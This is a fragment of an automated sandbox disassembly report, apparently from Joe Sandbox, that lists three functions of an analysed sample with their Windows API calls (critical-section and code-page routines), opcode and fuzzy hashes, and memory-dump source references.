                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: @G@K$A@K.
                                                              • API String ID: 4132704954-2457859030
                                                              • Opcode ID: eec83722eb2856bd13c5ccd16eeb5a217927af5c1102e52f61e64dd9668075e8
                                                              • Instruction ID: ddc5897f6cf7176c3945eab4e5655f82218a61355b0318d0d71247dec4337e0a
                                                              • Opcode Fuzzy Hash: eec83722eb2856bd13c5ccd16eeb5a217927af5c1102e52f61e64dd9668075e8
                                                              • Instruction Fuzzy Hash: 22018CB4E807089FC710DF68E981A5CF7B1AB88310F51617EE91597380DF34AD008F99
                                                              Function 00408000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00408069
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: @G@K$ZYA.
                                                              • API String ID: 2296764815-4236202813
                                                              • Opcode ID: 947c1552c58e194b7a3d6d09b3e8e23b227eb584c540669558338eb5038ea2ef
                                                              • Instruction ID: eb81366a0546a1846772a52cdd9905172eab691cb68f5f869d784b912a5327a9
                                                              • Opcode Fuzzy Hash: 947c1552c58e194b7a3d6d09b3e8e23b227eb584c540669558338eb5038ea2ef
                                                              • Instruction Fuzzy Hash: CC01AD74E003049FC750DFA8E982958B7B0AB88314F20517EF809673D1CE3C6948CB4D
                                                              Function 00407EF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00407F59
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: @G@K$A@K.
                                                              • API String ID: 2296764815-2457859030
                                                              • Opcode ID: 12fe1a893f377b097c77001a84ae484a33a6e34f4be5b5691fdf45b548d45959
                                                              • Instruction ID: 91eda301f18b728dd67868f27b5654014bad386d0337af4a7680e78ba29a92ce
                                                              • Opcode Fuzzy Hash: 12fe1a893f377b097c77001a84ae484a33a6e34f4be5b5691fdf45b548d45959
                                                              • Instruction Fuzzy Hash: DE016D74E007089BC710DFA8E982658B7B1AB48704F10617FF90567391DE39AD048B9D
                                                              Function 0041EA79 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetOEMCP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,74DEDF80,00000000), ref: 0041EAA4
                                                              • GetACP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,74DEDF80,00000000), ref: 0041EABB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A
                                                              • API String ID: 0-2078354741
                                                              • Opcode ID: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                              • Instruction ID: 11c898d43c4d10c0ecc91de2811935f638b4c1e560e8759715af35a6ff81dd82
                                                              • Opcode Fuzzy Hash: 9e5e6d681178d40b1d22602b92e1b051e41c2617d79a70cd3cab338379cdb20d
                                                              • Instruction Fuzzy Hash: F2F062745002058BEB10DB65D8497ADF770BF40379F640359F529872E2CBB599C5CB4D